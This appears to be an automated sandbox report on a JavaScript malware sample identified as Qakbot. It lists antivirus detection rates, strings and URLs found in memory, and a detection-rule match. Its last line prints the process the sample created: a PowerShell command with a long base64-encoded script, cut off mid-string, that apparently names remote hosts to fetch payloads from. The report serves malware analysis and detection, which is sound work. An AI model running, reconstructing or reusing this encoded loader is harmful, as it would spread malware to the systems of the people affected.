Source: Semischolastica.js |
Avira: detected |
Source: Semischolastica.js |
ReversingLabs: Detection: 13% |
Source: Semischolastica.js |
Virustotal: Detection: 30% |
Source: C:\ProgramData\WeigelasScribbleable.js |
Avira: detection malicious, Label: JS/Qakbot.G |
Source: |
Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs089 source: powershell.exe, 00000003.00000002.965250834.0000021D7D1A0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdbGM= source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.pdbY source: powershell.exe, 00000003.00000002.964639964.0000021D7CFA0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7CFBA000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: wscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.dr |
String found in binary or memory: https://github.com/imaya/zlib.js |
Source: powershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AU
QBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBI |